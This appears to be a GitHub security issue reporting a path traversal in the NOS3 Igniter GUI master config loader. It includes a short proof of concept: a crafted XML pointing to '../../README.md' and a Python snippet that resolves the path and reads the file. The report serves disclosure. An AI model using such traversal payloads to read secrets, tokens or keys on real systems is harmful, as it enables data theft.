Path Traversal in Igniter GUI Master Configuration Loader Allows Arbitrary Local File Read

[yanghuiyao779-blip]

Description

Define the problem

The Igniter GUI master config parser reads sc-x-cfg values from a user-selected XML file and opens
child files using direct path concatenation, without canonicalization or directory confinement.
This allows ../ traversal to escape the selected config directory and read arbitrary local files
readable by the current user.

Relevant code:

• cfg_gui_main.py:304
• cfg_gui_main.py:306:306
• cfg_gui_main.py:311:311

Capture the setup

• Branch: main
• Git hash: 4428de5
• Configuration changes:

1. Created temporary PoC file: tmp_gui_traversal_poc/inner/master.xml
2. Set ../../README.md in that file
3. No persistent source/config changes were required

Steps to recreate

1. Create a crafted master config:

mkdir -p tmp_gui_traversal_poc/inner
cat > tmp_gui_traversal_poc/inner/master.xml <<'XML'

1
../../README.md

XML

2. Reproduce using the same path logic as target code:

python3 - <<'PY'
 from pathlib import Path
 import xml.etree.ElementTree as ET
 master=Path('tmp_gui_traversal_poc/inner/master.xml')
 config_path=str(master)
 config_dir=str(config_path.rsplit('/',1)[0])
 child=[c.text for c in ET.parse(config_path).getroot() if c.tag=='sc-1-cfg'][0]
 candidate=Path(f'{config_dir}/{child}')
 print('resolved=', candidate.resolve())
 print('is_file=', candidate.is_file())
 if candidate.is_file():
     print('preview=', candidate.read_text(encoding='utf-8',errors='ignore').splitlines()[0])
 PY

Logs or screenshots

Observed output:

  - resolved= /home/swift/nos3/README.md
  - is_file= True
  - preview= # NASA Operational Simulator for Space Systems (NOS3)

Impact

An attacker who can convince an operator to open a crafted master XML can disclose arbitrary local
files (secrets, tokens, keys, internal configs, source files), causing a confidentiality breach.

———

OS

No response